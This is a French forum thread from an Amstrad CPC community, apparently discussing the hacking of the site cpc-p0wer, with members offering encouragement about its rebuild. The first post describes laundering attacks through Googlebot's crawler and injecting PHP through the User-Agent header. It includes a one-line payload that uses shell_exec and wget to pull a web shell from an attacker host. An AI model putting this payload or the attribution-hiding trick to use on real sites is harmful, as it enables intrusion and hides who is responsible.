On peut voir suffisament de choses et d'informations sensibles dans le code source PHP pour commencer à faire des bêtises. (je n'en montre pas plus...)
Tu mets simplement le script d'attaque sur une page web genre 000webhost.com, tu y places le lien malicieux, puis tu laisses Google indexer le site. Il va forcément suivre le lien (son robot les suit tous) et perpétrer l'attaque. C'est donc l'IP de GG qui sera loguée au lieu de celle du pirate... simple et efficace.
Les possibilités sont quasi-infinies : les webmasters pensent souvent qu'on ne peut pas écrire ou injecter du code dans leur site web. Mais leurs scripts de stats sniffent l'User-Agent du visiteur et vont l'écrire en Bdd. Rien de plus simple alors que d'écrire dans l'UA notre script malicieux. Par exemple un <?shell_exec(\\\'wget http://mechant_hacker.net/jtenik.txt -O shell.php\\\');?> En cas de faille LFI, RFI ou XSS, vous avez votre shell. ^^
Inscription : 29 Août 2007, 12:04 Message(s) : 1992 Localisation : seine et marne 77
Justement, y a un truc que j'ai du mal à saisir, bon ok le site a été hacké......
Mais pourquoi retirer des choses ou des fonctions sur la prochaine version mise en ligne ?
Le contenu était parfait lui......... La preuve, cpc-p0wer était avant le hack le site n°1 du CPC.
Je veux dire (mode laurent Gerra /On) :
- "Ahhhh merdeuuhhhhh, on m'a crevé les pneus de la bagnole !!!!, putain fais chier quoi !!!!" - (Mode Gégé) Uhhhh Uhhhh bon allez lööö !!! j'vais ché l'gärägiste, Uhhh Uhhh, j'me rah-chète une bagnole !! - La Jeanne Moreau : Uiiiiiii mon gégé, c'est qu'un gros loseeuurrr le hacker, tu changes le site et tu remets en ligne
Mode Laurent Gerra /Off
_________________ SPS Community Expert (SPS CE) / SPS France
Inscription : 15 Août 2008, 13:00 Message(s) : 968 Localisation : Troyes, France
dlfrsilver a écrit :
Justement, y a un truc que j'ai du mal à saisir, bon ok le site a été hacké......
Mais pourquoi retirer des choses ou des fonctions sur la prochaine version mise en ligne ?
Pour justement avoir moins de fonctionnalités qui pourraient exposer le site.Quand on a du code qui fonctionne mal et qu'il y trop de boulot à le modifier, autant reprendre de zéro.L'essentiel étant d'avoir le contenu qui lui est formidable.
Courage Bruno , tu vas nous faire une version 2.0 du cpc-p0wer encore meilleure ! on est tous avec toi
_________________ "NOP" tel est le programme parfait ! court, rapide, lisible et sans bugs (connus)
Salut a tous Je pense que je fais partie de cette majorité silencieuse dont on a parlé et qui parcours avec joie, la plupart du temps sauf pour ce type de nouvelle, ce site et ceux liés à notre bonne machine. Alors quelle mauvaise surprise que de voir que cpc p0wer etait down suite a un mauvais plaisantin en manque de terrain de jeu. Après une rude journée, un petit tour en parcourant 2 3 fiches en lisant quelques commentaires et ca redonnait un coup de boost!
Parlons fonctionnalités : il y en a déjà une que je veux revoir c'est le don PayPal cette année je n'avais pas encore fait un petit don et je compte bien le faire
Encore une fois bon courage kukulcan
J'en profite pour saluer le boulot fait cpcrulez et la communauté, y'en a pour tous les gouts avec les nombreux sujets bref un régal.
Utilisateur(s) parcourant ce forum : Aucun utilisateur inscrit et 21 invité(s)
Vous ne pouvez pas publier de nouveaux sujets dans ce forum Vous ne pouvez pas répondre aux sujets dans ce forum Vous ne pouvez pas éditer vos messages dans ce forum Vous ne pouvez pas supprimer vos messages dans ce forum Vous ne pouvez pas insérer de pièces jointes dans ce forum